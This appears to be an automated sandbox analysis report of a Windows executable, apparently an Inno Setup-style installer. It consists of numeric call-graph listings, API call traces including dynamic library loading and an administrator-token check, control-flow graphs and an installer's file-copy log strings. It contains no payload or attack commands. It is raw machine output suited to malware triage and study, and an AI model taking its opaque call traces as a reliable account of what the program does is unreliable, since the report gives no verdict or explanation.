4352c0 53369->53374 53378 4352f0 53374->53378 53385 43530a 53374->53385 53375 403400 4 API calls 53376 43570f 53375->53376 53376->53373 53387 435720 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53376->53387 53377 446d9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53377->53378 53378->53377 53379 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53378->53379 53380 402648 4 API calls 53378->53380 53381 431c98 4 API calls 53378->53381 53382 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53378->53382 53384 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53378->53384 53378->53385 53388 4343a8 53378->53388 53400 434b6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53378->53400 53379->53378 53380->53378 53381->53378 53382->53378 53384->53378 53385->53375 53387->53373 53389 434465 53388->53389 53390 4343d5 53388->53390 53419 434308 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53389->53419 53392 403494 4 API calls 53390->53392 53393 4343e3 53392->53393 53394 403778 4 API calls 53393->53394 53398 434404 53394->53398 53395 403400 4 API calls 53396 4344b5 53395->53396 53396->53378 53397 434457 53397->53395 53398->53397 53401 493e50 53398->53401 53400->53378 53402 493e88 53401->53402 53403 493f20 53401->53403 53405 403494 4 API calls 53402->53405 53420 448928 53403->53420 53408 493e93 53405->53408 53406 403400 4 API calls 53407 493f44 53406->53407 53410 403400 4 API calls 53407->53410 53409 4037b8 4 API calls 53408->53409 53412 493ea3 53408->53412 53413 493ebc 53409->53413 53411 493f4c 53410->53411 53411->53398 53412->53406 53413->53412 53414 4037b8 4 API calls 53413->53414 53415 493edf 53414->53415 53416 403778 4 API calls 53415->53416 53417 493f10 53416->53417 53418 403634 4 API calls 53417->53418 53418->53403 53419->53397 53421 44894d 53420->53421 53422 448990 53420->53422 53423 403494 4 API calls 53421->53423 53425 4489a4 53422->53425 53432 448524 53422->53432 53424 448958 53423->53424 53429 4037b8 4 API calls 53424->53429 53427 403400 4 API calls 53425->53427 53428 4489d7 53427->53428 53428->53412 53430 448974 53429->53430 53431 4037b8 4 API calls 53430->53431 53431->53422 53433 403494 4 API calls 53432->53433 53434 44855a 53433->53434 53435 4037b8 4 API calls 53434->53435 53436 44856c 53435->53436 53437 403778 4 API calls 53436->53437 53438 44858d 53437->53438 53439 4037b8 4 API calls 53438->53439 53440 4485a5 53439->53440 53441 403778 4 API calls 53440->53441 53442 4485d0 53441->53442 53443 4037b8 4 API calls 53442->53443 53454 4485e8 53443->53454 53444 448620 53446 403420 4 API calls 53444->53446 53445 4486bb 53448 4486c3 GetProcAddress 53445->53448 53449 448700 53446->53449 53447 448655 LoadLibraryA 53447->53454 53451 4486d6 53448->53451 53449->53425 53450 448643 LoadLibraryExA 53450->53454 53451->53444 53452 403b80 4 API calls 53452->53454 53453 403450 4 API calls 53453->53454 53454->53444 53454->53445 53454->53447 53454->53450 53454->53452 53454->53453 53456 43da80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53454->53456 53456->53454 56415 416b3a 56416 416be2 56415->56416 56417 416b52 56415->56417 56434 415314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56416->56434 56418 416b60 56417->56418 56419 416b6c SendMessageA 56417->56419 56421 416b86 56418->56421 56422 416b6a CallWindowProcA 56418->56422 56430 416bc0 56419->56430 56431 41a050 GetSysColor 56421->56431 56422->56430 56425 416b91 SetTextColor 56426 416ba6 56425->56426 56432 41a050 GetSysColor 56426->56432 56428 416bab SetBkColor 56433 41a6d8 GetSysColor CreateBrushIndirect 56428->56433 56431->56425 56432->56428 56433->56430 56434->56430 53457 40ce1c 53460 406f00 WriteFile 53457->53460 53461 406f1d 53460->53461 56435 4980b4 56493 403344 56435->56493 56437 4980c2 56496 4056a0 56437->56496 56439 4980c7 56499 40631c GetModuleHandleA GetProcAddress 56439->56499 56445 4980d6 56516 41094c 56445->56516 56447 4980db 56520 412920 56447->56520 56449 4980e5 56525 419038 GetVersion 56449->56525 56766 4032fc 56493->56766 56495 403349 GetModuleHandleA GetCommandLineA 56495->56437 56498 4056db 56496->56498 56767 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56496->56767 56498->56439 56500 406338 56499->56500 56501 40633f GetProcAddress 56499->56501 56500->56501 56502 406355 GetProcAddress 56501->56502 56503 40634e 56501->56503 56504 406364 SetProcessDEPPolicy 56502->56504 56505 406368 56502->56505 56503->56502 56504->56505 56506 40993c 56505->56506 56768 409014 56506->56768 56511 408710 7 API calls 56512 40995f 56511->56512 56783 409060 GetVersionExA 56512->56783 56515 409b70 6F551CD0 56515->56445 56517 410956 56516->56517 56518 410995 GetCurrentThreadId 56517->56518 56519 4109b0 56518->56519 56519->56447 56785 40aef4 56520->56785 56524 41294c 56524->56449 56797 41de1c 8 API calls 56525->56797 56527 419051 56799 418f30 GetCurrentProcessId 56527->56799 56766->56495 56767->56498 56769 408cac 5 API calls 56768->56769 56770 409025 56769->56770 56771 4085cc GetSystemDefaultLCID 56770->56771 56773 408602 56771->56773 56772 406ddc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56772->56773 56773->56772 56774 408558 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56773->56774 56775 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56773->56775 56777 408664 56773->56777 56774->56773 56775->56773 56776 406ddc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56776->56777 56777->56776 56778 408558 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56777->56778 56779 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56777->56779 56780 4086e7 56777->56780 56778->56777 56779->56777 56781 403420 4 API calls 56780->56781 56782 408701 56781->56782 56782->56511 56784 409077 56783->56784 56784->56515 56787 40aefb 56785->56787 56786 40af1a 56789 411004 56786->56789 56787->56786 56796 40ae2c 19 API calls 56787->56796 56790 411026 56789->56790 56791 406ddc 5 API calls 56790->56791 56792 403450 4 API calls 56790->56792 56793 411045 56790->56793 56791->56790 56792->56790 56794 403400 4 API calls 56793->56794 56795 41105a 56794->56795 56795->56524 56796->56787 56798 41de96 56797->56798 56798->56527 56815 4078b0 56799->56815 56816 4078c3 56815->56816 56817 4075a8 19 API calls 56816->56817 58074 41663c 58075 4166a3 58074->58075 58076 416649 58074->58076 58082 4162c2 58076->58082 58086 416548 CreateWindowExA 58076->58086 58077 416650 SetPropA SetPropA 58077->58075 58078 416683 58077->58078 58079 416696 SetWindowPos 58078->58079 58079->58075 58083 4162ee 58082->58083 58084 4162ce GetClassInfoA 58082->58084 58083->58077 58084->58083 58085 4162e2 GetClassInfoA 58084->58085 58085->58083 58086->58077 53462 4222dc 53463 4222eb 53462->53463 53468 42126c 53463->53468 53466 42230b 53469 4212db 53468->53469 53483 42127b 53468->53483 53472 4212ec 53469->53472 53493 4124c8 GetMenuItemCount GetMenuStringA GetMenuState 53469->53493 53471 42131a 53475 42138d 53471->53475 53480 421335 53471->53480 53472->53471 53474 4213b2 53472->53474 53473 42138b 53476 4213de 53473->53476 53495 421e24 11 API calls 53473->53495 53474->53473 53478 4213c6 SetMenu 53474->53478 53475->53473 53482 4213a1 53475->53482 53496 4211b4 10 API calls 53476->53496 53478->53473 53480->53473 53486 421358 GetMenu 53480->53486 53481 4213e5 53481->53466 53491 4221e0 10 API calls 53481->53491 53485 4213aa SetMenu 53482->53485 53483->53469 53492 408d1c 19 API calls 53483->53492 53485->53473 53487 421362 53486->53487 53488 42137b 53486->53488 53490 421375 SetMenu 53487->53490 53494 4124c8 GetMenuItemCount GetMenuStringA GetMenuState 53488->53494 53490->53488 53491->53466 53492->53483 53493->53472 53494->53473 53495->53476 53496->53481

                                                                  Executed Functions

                                                                  Function 004704C8 Relevance: 78.0, APIs: 4, Strings: 40, Instructions: 956COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Time stamp of our file: (failed to read), xrefs: 004707C7
                                                                  • Failed to strip read-only attribute., xrefs: 00470CF3
                                                                  • User opted not to overwrite the existing file. Skipping., xrefs: 00470C6D
                                                                  • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470CB6
                                                                  • Will register the file (a DLL/OCX) later., xrefs: 00471325
                                                                  • p%G, xrefs: 0047151A
                                                                  • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470C0C
                                                                  • InUn, xrefs: 00470F65
                                                                  • Skipping due to "onlyifdoesntexist" flag., xrefs: 004707EE
                                                                  • Stripped read-only attribute., xrefs: 00470CE7
                                                                  • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470AE4
                                                                  • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470D1A
                                                                  • Time stamp of existing file: %s, xrefs: 0047084B
                                                                  • Version of our file: (none), xrefs: 0047091C
                                                                  • Couldn't read time stamp. Skipping., xrefs: 00470B55
                                                                  • Version of our file: %u.%u.%u.%u, xrefs: 00470910
                                                                  • Will register the file (a type library) later., xrefs: 00471319
                                                                  • Version of existing file: %u.%u.%u.%u, xrefs: 0047099C
                                                                  • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470AF0
                                                                  • Installing the file., xrefs: 00470D29
                                                                  • Uninstaller requires administrator: %s, xrefs: 00470F95
                                                                  • Dest file is protected by Windows File Protection., xrefs: 0047070D
                                                                  • Time stamp of our file: %s, xrefs: 004707BB
                                                                  • Incrementing shared file count (32-bit)., xrefs: 004713AB
                                                                  • -- File entry --, xrefs: 0047051B
                                                                  • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470AD5
                                                                  • Incrementing shared file count (64-bit)., xrefs: 00471392
                                                                  • Non-default bitness: 32-bit, xrefs: 004706DB
                                                                  • Dest file exists., xrefs: 004707DB
                                                                  • , xrefs: 004709EF, 00470BC0, 00470C3E
                                                                  • Version of existing file: (none), xrefs: 00470B1A
                                                                  • Existing file has a later time stamp. Skipping., xrefs: 00470BEF
                                                                  • Time stamp of existing file: (failed to read), xrefs: 00470857
                                                                  • @, xrefs: 004705D0
                                                                  • Existing file is a newer version. Skipping., xrefs: 00470A22
                                                                  • Dest filename: %s, xrefs: 004706B4
                                                                  • Same time stamp. Skipping., xrefs: 00470B75
                                                                  • Non-default bitness: 64-bit, xrefs: 004706CF
                                                                  • .tmp, xrefs: 00470DD7
                                                                  • Same version. Skipping., xrefs: 00470B05
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.$p%G
                                                                  • API String ID: 0-1519224904
                                                                  • Opcode ID: c85e02cee53c90be4c09432cdc1bed37a126afc3c982ec3092a00699d9325f6e
                                                                  • Instruction ID: 29ad728ada19ee594bb20a6f10617e7c4442303fd1b73b354b0c7f106615fe65
                                                                  • Opcode Fuzzy Hash: c85e02cee53c90be4c09432cdc1bed37a126afc3c982ec3092a00699d9325f6e
                                                                  • Instruction Fuzzy Hash: 64928534A0528CDFDB11DFA9C485BDDBBB5AF05308F1480ABE848A7392C7789E45CB59
                                                                  Function 0042E094 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 178memorylibraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1546 42e094-42e0a5 1547 42e0b0-42e0d5 AllocateAndInitializeSid 1546->1547 1548 42e0a7-42e0ab 1546->1548 1549 42e27f-42e287 1547->1549 1550 42e0db-42e0f8 GetVersion 1547->1550 1548->1549 1551 42e111-42e113 1550->1551 1552 42e0fa-42e10f GetModuleHandleA GetProcAddress 1550->1552 1553 42e115-42e123 CheckTokenMembership 1551->1553 1554 42e13a-42e154 GetCurrentThread OpenThreadToken 1551->1554 1552->1551 1555 42e261-42e277 FreeSid 1553->1555 1556 42e129-42e135 1553->1556 1557 42e156-42e160 GetLastError 1554->1557 1558 42e18b-42e1b3 GetTokenInformation 1554->1558 1556->1555 1561 42e162-42e167 call 4031bc 1557->1561 1562 42e16c-42e17f GetCurrentProcess OpenProcessToken 1557->1562 1559 42e1b5-42e1bd GetLastError 1558->1559 1560 42e1ce-42e1f2 call 402648 GetTokenInformation 1558->1560 1559->1560 1563 42e1bf-42e1c9 call 4031bc * 2 1559->1563 1572 42e200-42e208 1560->1572 1573 42e1f4-42e1fe call 4031bc * 2 1560->1573 1561->1549 1562->1558 1566 42e181-42e186 call 4031bc 1562->1566 1563->1549 1566->1549 1575 42e20a-42e20b 1572->1575 1576 42e23b-42e259 call 402660 CloseHandle 1572->1576 1573->1549 1579 42e20d-42e220 EqualSid 1575->1579 1583 42e222-42e22f 1579->1583 1584 42e237-42e239 1579->1584 1583->1584 1587 42e231-42e235 1583->1587 1584->1576 1584->1579 1587->1576
                                                                  APIs
                                                                  • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0CE
                                                                  • GetVersion.KERNEL32(00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0EB
                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E104
                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E10A
                                                                  • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11F
                                                                  • FreeSid.ADVAPI32(00000000,0042E27F,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E272
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                  • String ID: CheckTokenMembership$advapi32.dll
                                                                  • API String ID: 2252812187-1888249752
                                                                  • Opcode ID: a9fe6633055198f43e03035385e24ba146a4a62582313a35ed9699780c9b0276
                                                                  • Instruction ID: a71ca61110966f780236f7e78469af046a056b7130da329bb4013a210d9377b5
                                                                  • Opcode Fuzzy Hash: a9fe6633055198f43e03035385e24ba146a4a62582313a35ed9699780c9b0276
                                                                  • Instruction Fuzzy Hash: 65519371B44615EAEF10EAE69C42FBF77ACEB19304F9404BBB901F7281D57899008A79
                                                                  Function 00423C04 Relevance: 21.4, APIs: 14, Instructions: 395COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1674 423c04-423c38 1675 423c3a-423c3b 1674->1675 1676 423c6c-423c83 call 423b60 1674->1676 1678 423c3d-423c59 call 40b434 1675->1678 1681 423ce4-423ce9 1676->1681 1682 423c85 1676->1682 1711 423c5b-423c63 1678->1711 1712 423c68-423c6a 1678->1712 1684 423ceb 1681->1684 1685 423d1f-423d24 1681->1685 1686 423c8b-423c8e 1682->1686 1687 423d48-423d58 1682->1687 1688 423cf1-423cf9 1684->1688 1689 423fa9-423fb1 1684->1689 1692 424092-4240a0 IsIconic 1685->1692 1693 423d2a-423d2d 1685->1693 1690 423c90 1686->1690 1691 423cbd-423cc0 1686->1691 1694 423d63-423d6b call 42418c 1687->1694 1695 423d5a-423d5f 1687->1695 1698 423f0b-423f32 SendMessageA 1688->1698 1699 423cff-423d04 1688->1699 1701 42414a-424152 1689->1701 1706 423fb7-423fc2 call 4181d8 1689->1706 1702 423c96-423c99 1690->1702 1703 423dee-423dfe call 423b7c 1690->1703 1707 423da1-423da8 1691->1707 1708 423cc6-423cc7 1691->1708 1700 4240a6-4240b1 GetFocus 1692->1700 1692->1701 1704 423d33-423d34 1693->1704 1705 4240ce-4240e3 call 424848 1693->1705 1694->1701 1709 423d70-423d78 call 4241d4 1695->1709 1710 423d61-423d84 call 423b7c 1695->1710 1698->1701 1713 424042-42404d 1699->1713 1714 423d0a-423d0b 1699->1714 1700->1701 1722 4240b7-4240c0 call 41efec 1700->1722 1715 424169-42416f 1701->1715 1723 423e16-423e32 PostMessageA call 423b7c 1702->1723 1724 423c9f-423ca2 1702->1724 1703->1701 1717 4240e5-4240ec 1704->1717 1718 423d3a-423d3d 1704->1718 1705->1701 1706->1701 1750 423fc8-423fd7 call 4181d8 IsWindowEnabled 1706->1750 1707->1701 1727 423dae-423db5 1707->1727 1728 423f37-423f3e 1708->1728 1729 423ccd-423cd0 1708->1729 1709->1701 1710->1701 1711->1715 1712->1676 1712->1678 1713->1701 1733 424053-424065 1713->1733 1730 423d11-423d14 1714->1730 1731 42406a-424075 1714->1731 1744 424103-424116 call 424524 1717->1744 1745 4240ee-424101 call 4244cc 1717->1745 1734 423d43 1718->1734 1735 424118-42411f 1718->1735 1722->1701 1782 4240c6-4240cc SetFocus 1722->1782 1723->1701 1741 423ca8-423cab 1724->1741 1742 423e9d-423ea4 1724->1742 1727->1701 1747 423dbb-423dc1 1727->1747 1728->1701 1737 423f44-423f49 call 404e54 1728->1737 1748 423cd6-423cd9 1729->1748 1749 423e37-423e57 call 423b7c 1729->1749 1756 423d1a 1730->1756 1757 423f4e-423f56 1730->1757 1731->1701 1759 42407b-42408d 1731->1759 1733->1701 1758 424143-424144 call 423b7c 1734->1758 1754 424132-424141 1735->1754 1755 424121-424130 1735->1755 1737->1701 1765 423cb1-423cb2 1741->1765 1766 423dc6-423dd4 IsIconic 1741->1766 1767 423ea6-423eb9 call 423b0c 1742->1767 1768 423ed7-423ee8 call 423b7c 1742->1768 1744->1701 1745->1701 1747->1701 1751 423e03-423e11 call 424170 1748->1751 1752 423cdf 1748->1752 1795 423e7b-423e98 call 423a7c PostMessageA 1749->1795 1796 423e59-423e76 call 423b0c PostMessageA 1749->1796 1750->1701 1799 423fdd-423fec call 4181d8 IsWindowVisible 1750->1799 1751->1701 1752->1758 1754->1701 1755->1701 1756->1758 1757->1701 1780 423f5c-423f63 1757->1780 1791 424149 1758->1791 1759->1701 1783 423cb8 1765->1783 1784 423d89-423d91 1765->1784 1773 423de2-423de9 call 423b7c 1766->1773 1774 423dd6-423ddd call 423bb8 1766->1774 1808 423ecb-423ed2 call 423b7c 1767->1808 1809 423ebb-423ec5 call 41ef50 1767->1809 1802 423eea-423ef0 call 41ee9c 1768->1802 1803 423efe-423f06 call 423a7c 1768->1803 1773->1701 1774->1701 1780->1701 1794 423f69-423f78 call 4181d8 IsWindowEnabled 1780->1794 1782->1701 1783->1758 1784->1701 1797 423d97-423d9c call 422c44 1784->1797 1791->1701 1794->1701 1824 423f7e-423f94 call 412308 1794->1824 1795->1701 1796->1701 1797->1701 1799->1701 1825 423ff2-42403d GetFocus call 4181d8 SetFocus call 415238 SetFocus 1799->1825 1822 423ef5-423ef8 1802->1822 1803->1701 1808->1701 1809->1808 1822->1803 1824->1701 1830 423f9a-423fa4 1824->1830 1825->1701 1830->1701
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9ffe30bceb486a938f48287b2c3da3d7a5ad61c49b50789ac52c05ed45da257e
                                                                  • Instruction ID: 2c29f6787255d97ab3f4589ac6aadd45d54e60a31d0a4dda1db310adca3c7782
                                                                  • Opcode Fuzzy Hash: 9ffe30bceb486a938f48287b2c3da3d7a5ad61c49b50789ac52c05ed45da257e
                                                                  • Instruction Fuzzy Hash: 60E18031700124DFD710DF69E989A6E77F4EB54305FA580AAE4059B3A2C73CEE91EB09
                                                                  Function 004671CC Relevance: 13.9, APIs: 4, Strings: 3, Instructions: 1649windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2185 4671cc-4671e2 2186 4671e4-4671e7 call 402d30 2185->2186 2187 4671ec-4672a3 call 494c88 call 402b30 * 6 2185->2187 2186->2187 2204 4672a5-4672cc call 414634 2187->2204 2205 4672e0-4672f9 2187->2205 2209 4672d1-4672db call 4145f4 2204->2209 2210 4672ce 2204->2210 2211 467336-467344 call 494f90 2205->2211 2212 4672fb-467322 call 414614 2205->2212 2209->2205 2210->2209 2220 467346-467355 call 494dd8 2211->2220 2221 467357-467359 call 494efc 2211->2221 2218 467327-467331 call 4145d4 2212->2218 2219 467324 2212->2219 2218->2211 2219->2218 2226 46735e-4673b1 call 4948ec call 41a3c8 * 2 2220->2226 2221->2226 2233 4673c2-4673d7 call 45142c call 414b10 2226->2233 2234 4673b3-4673c0 call 414b10 2226->2234 2240 4673dc-4673e3 2233->2240 2234->2240 2241 4673e5-467426 call 4146b4 call 4146f8 call 420f90 call 420fbc call 420b60 call 420b8c 2240->2241 2242 46742b-4678b1 call 494d28 call 49504c call 414614 * 3 call 4146b4 call 4145d4 * 3 call 460a24 call 460a3c call 460a48 call 460a90 call 460a24 call 460a3c call 460a48 call 460a90 call 460a3c call 460a90 LoadBitmapA call 41d6a8 call 460a60 call 460a78 call 466fa8 call 468abc call 466628 call 40357c call 414b10 call 466960 call 466968 call 466628 call 40357c * 2 call 414b10 call 468abc call 466628 call 414b10 call 466960 call 466968 call 414b10 * 2 call 468abc call 414b10 * 2 call 466960 call 4145f4 call 466960 call 4145f4 call 468abc call 414b10 call 466960 call 466968 call 468abc call 414b10 call 466960 call 4145f4 * 2 call 414b10 call 466960 call 4145f4 2240->2242 2241->2242 2372 4678b3-46790b call 4145f4 call 414b10 call 466960 call 4145f4 2242->2372 2373 46790d-467926 call 414a3c * 2 2242->2373 2380 46792b-4679dc call 466628 call 468abc call 466628 call 414b10 call 49504c call 466960 2372->2380 2373->2380 2399 467a16-467c4c call 466628 call 414b10 call 49505c * 2 call 42e8b8 call 4145f4 call 466960 call 4145f4 call 4181d8 call 42ed30 call 414b10 call 494d28 call 49504c call 414614 call 466628 call 414b10 call 466960 call 4145f4 call 466628 call 468abc call 466628 call 414b10 call 466960 call 4145f4 call 466968 call 466628 call 414b10 call 466960 2380->2399 2400 4679de-4679f9 2380->2400 2461 467c4e-467c57 2399->2461 2462 467c8d-467d46 call 466628 call 468abc call 466628 call 414b10 call 49504c call 466960 2399->2462 2401 4679fe-467a11 call 4145f4 2400->2401 2402 4679fb 2400->2402 2401->2399 2402->2401 2461->2462 2463 467c59-467c88 call 414a3c call 466968 2461->2463 2480 467d80-4681a1 call 466628 call 414b10 call 49505c * 2 call 42e8b8 call 4145f4 call 466960 call 4145f4 call 414b10 call 494d28 call 49504c call 414614 call 414b10 call 466628 call 468abc call 466628 call 414b10 call 466960 call 466968 call 42bbc8 call 49505c call 44e8a8 call 466628 call 468abc call 466628 call 468abc call 466628 call 468abc * 2 call 414b10 call 466960 call 466968 call 468abc call 4948ec call 41a3c8 call 466628 call 40357c call 414b10 call 466960 call 4145f4 call 414b10 * 2 call 49505c call 403494 call 40357c * 2 call 414b10 2462->2480 2481 467d48-467d63 2462->2481 2463->2462 2580 4681c5-4681cc 2480->2580 2581 4681a3-4681c0 call 44ffb0 call 45010c 2480->2581 2482 467d65 2481->2482 2483 467d68-467d7b call 4145f4 2481->2483 2482->2483 2483->2480 2583 4681f0-4681f7 2580->2583 2584 4681ce-4681eb call 44ffb0 call 45010c 2580->2584 2581->2580 2586 46821b-468261 call 4181d8 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468bb0 2583->2586 2587 4681f9-468216 call 44ffb0 call 45010c 2583->2587 2584->2583 2601 468263-46826a 2586->2601 2602 46827b 2586->2602 2587->2586 2603 468277-468279 2601->2603 2604 46826c-468275 2601->2604 2605 46827d-46828c 2602->2605 2603->2605 2604->2602 2604->2603 2606 4682a6 2605->2606 2607 46828e-468295 2605->2607 2610 4682a8-4682c2 2606->2610 2608 468297-4682a0 2607->2608 2609 4682a2-4682a4 2607->2609 2608->2606 2608->2609 2609->2610 2611 46836b-468372 2610->2611 2612 4682c8-4682d1 2610->2612 2615 468405-468413 call 414b10 2611->2615 2616 468378-46839b call 47bb50 call 403450 2611->2616 2613 4682d3-46832a call 47bb50 call 414b10 call 47bb50 call 414b10 call 47bb50 call 414b10 2612->2613 2614 46832c-468366 call 414b10 * 3 2612->2614 2613->2611 2614->2611 2622 468418-468421 2615->2622 2635 4683ac-4683c0 call 403494 2616->2635 2636 46839d-4683aa call 47bcf0 2616->2636 2626 468427-46843f call 429fd0 2622->2626 2627 468531-468560 call 42b964 call 44e834 2622->2627 2644 4684b6-4684ba 2626->2644 2645 468441-468445 2626->2645 2661 468566-46856a 2627->2661 2662 46860e-468612 2627->2662 2657 4683d2-468403 call 42c7fc call 42cbb8 call 403494 call 414b10 2635->2657 2658 4683c2-4683cd call 403494 2635->2658 2636->2657 2650 4684bc-4684c5 2644->2650 2651 46850a-46850e 2644->2651 2652 468447-468481 call 40b434 call 47bb50 2645->2652 2650->2651 2659 4684c7-4684d2 2650->2659 2655 468522-46852c call 42a054 2651->2655 2656 468510-468520 call 42a054 2651->2656 2712 468483-46848a 2652->2712 2713 4684b0-4684b4 2652->2713 2655->2627 2656->2627 2657->2622 2658->2657 2659->2651 2671 4684d4-4684d8 2659->2671 2663 46856c-46857e call 40b434 2661->2663 2664 468614-46861b 2662->2664 2665 468691-468695 2662->2665 2691 4685b0-4685e7 call 47bb50 call 44cb04 2663->2691 2692 468580-4685ae call 47bb50 call 44cbd4 2663->2692 2664->2665 2674 46861d-468624 2664->2674 2675 468697-4686ae call 40b434 2665->2675 2676 4686fe-468707 2665->2676 2680 4684da-4684fd call 40b434 call 406ab4 2671->2680 2674->2665 2685 468626-468631 2674->2685 2706 4686b0-4686ec call 40b434 call 469824 * 2 call 4696c4 2675->2706 2707 4686ee-4686fc call 469824 2675->2707 2683 468726-46873b call 466d08 call 466a84 2676->2683 2684 468709-468721 call 40b434 call 469824 2676->2684 2723 468504-468508 2680->2723 2724 4684ff-468502 2680->2724 2737 46878d-468797 call 414a3c 2683->2737 2738 46873d-468760 call 42a038 call 40b434 2683->2738 2684->2683 2685->2683 2694 468637-46863b 2685->2694 2739 4685ec-4685f0 2691->2739 2692->2739 2705 46863d-468653 call 40b434 2694->2705 2734 468686-46868a 2705->2734 